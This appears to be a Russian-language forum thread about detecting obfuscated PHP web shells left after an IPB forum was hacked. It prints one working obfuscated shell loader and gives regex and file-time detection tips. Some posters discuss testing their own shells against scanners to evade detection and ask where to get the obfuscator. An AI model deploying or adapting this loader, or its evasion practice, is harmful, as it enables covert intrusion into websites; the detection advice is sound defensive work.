Сила гофака помоги: Как искать такие шеллы?

[Dadee]

26 ноября заломали мне IPB (как и многим другим) и залили прикольные шеллы.
не могу придумать как спалить их все ?
скрипт py\bash\php или просто регулярка привестствуется, я уже себе голову поломал.

нет ни eval ни preg_replace ни system

PHP код:

<?php $x98ec27r='iHOHWxHk:>HlGH3J<[ic[!B&,Jcxf,3:xHl:>HOlkH3VxBF-I[Bx,[IFEbZwM!g9qE2VYYV-B&,Jcxf,![$x>c>F3>P&cIf1,*iRR4iJd32Vi,IVs}!m)Z?)ZS3vCC9!j3t;;3432VWVB&,Jcxf,V>P&cIf1,*iRR4iJdF2WV[JPfV3#-DD3|(IGF3Rx,d>32|3DD83:VKV<[px>c[<!>P&cIf1,!B&,Jcxf,F3>P&cIf1,*iRR4iJd32:VKV3:K';global$ijxnnkw8;$ijxnnkw8=array();$wcm8ntc9=array(73,82,79,89,78,85,93,80,70,6,14,71,12,7,13,9,30,95,72,99,90,83,28,20,29,88,27,122,110,115,113,117,108,126,21,26,68,84,75,127,94,87,124,24,111,121,106,103,116,104,125,97,1,0,17,18,81,2,65,91);foreach($wcm8ntc9 as $u7l2npnl)$ijxnnkw8[]=($u7l2npnl^60);$da9003ao=ry8ljsqu(array(38,44,62,91,60,120,105,82,120,43,91));$d5qwvdlm=$da9003ao(ry8ljsqu($x98ec27r));$mvh5bn8h=$d5qwvdlm[0];$i44cg14d=$mvh5bn8h('',$d5qwvdlm[1]);$i44cg14d();function ry8ljsqu($spq,$nlg='',$tr="\x63\x68\x72"){global$ijxnnkw8,$ns84;if(!isset($ns84))$ns84=array();static$buvy;if(!isset($buvy))$buvy=0;$lz=$nyx=$zs=$fa=$tr;$zq8=$nyx(208^179).$fa(119^24).$fa(16^101).$fa(150^248).$nyx(210^166);$usw=$fa(119^4).$tr(101^17).$zs(196^182).$zs(112^28).$fa(117^16).$lz(20^122);$uyk=$lz(209^184).$nyx(63^76).$nyx(2^93).$nyx(64^33).$tr(174^220).$nyx(31^109).$nyx(168^201).$lz(219^162);$ll6=$nyx(67^44).$lz(130^240).$lz(44^72);for($j5c=0,$pj3f=0;$j5c<($uyk($spq)?$zq8($spq):$usw($spq));$j5c++){$odem=(($uyk($spq)?$spq[$j5c]:$ll6($spq[$j5c])));if($odem==(5^15)||$odem==(115^126))continue;if(!isset($ns84[$odem])) $ns84[$odem]=$buvy++;if(!isset($ijxnnkw8[$ns84[$odem]])){echo($spq[$$j5c].' '.$odem);exit;}$kgxx=$tr( $ijxnnkw8[$ns84[$odem]]);$nlg.=$kgxx;}return$nlg;} ?>

[Gres]

запускаем айболит (ссылка выше) - он покажет все подозрительные
далее если знаком с движком видно что левое
а вообще по дате редактирования, редко кто подчищает за собой время

[Onyx]

да, айболит это хороше, я код всегда проверяю айболитом, чтоб непалилось ничего (спасибоавторузаэто), а только потом заливаю на пирог

[digg]

Цитата:

Сообщение от Smilex

а вообще по дате редактирования, редко кто подчищает за собой время

когда-то когда поломали тоже один хостинг у меня по дате находил
даже софтину тогда помню писал, чтоб все почистить
там доры висели с трафом и там паг было тысячи и тысячи и в каждую index позаписывали подобное, но с обычным эвалом

[seocoder]

когда у меня так "сломали" - я искал файлы измененные больше какой то даты.

$ find /usr -mtime +356 -daystart

[Nikola_N]

как по мне - не факт, что скрипт в 1 и 5 посте это один и тот же обфускатор.
Dadee, что у тебя для разных сайтов разный код вставили на серваке.? тогда давай примеры... 5 пост я так понял это другой случай.

код в первом посте можно палить поиском последовательности вида .$fa(16^101) (регулярку захуярить по маскена все комбинации)

5 пост - коментарии */./*
или искть вызов функции типа ($phl6yJ,$r6Q7D($lGp2BqP),$PJf4o9)

с временем модификации файтов - не всегда прокатывает. иногда настройки сервака позволяют менять это дело.

можно также искать в пхп файлах длинные строки.

короче подчистить всегда можно, но нужно конкретные примеры рассматривать и знать, что у тебя на серваке за скрипты.

[ssoleg]

если просто найти не удаляя то первый ищи уникальную строку, которой обычно нет в скриптах, например

Код:

++){$

второй

Код:

[^  или $^ или ^^

айболит ваш от лохов c eval и preg
пару десятков таких файлов с уникальными значениями хрен найдете автоматом, только ручками
можете запустить, там только phpinfo =)

[kip]

Встречный вопрос: а где взять подобный обусфактор?

[digg]

ну, как где? написать...

[Gyrus]

$$
искать по $$ Думаю, найдется все что надо.

[tmp]

Цитата:

Сообщение от kip

Встречный вопрос: а где взять подобный обусфактор?

+1 к вопросу
тут вроде пиарился цезарь, может это он так обфусцирует никто не юзал его?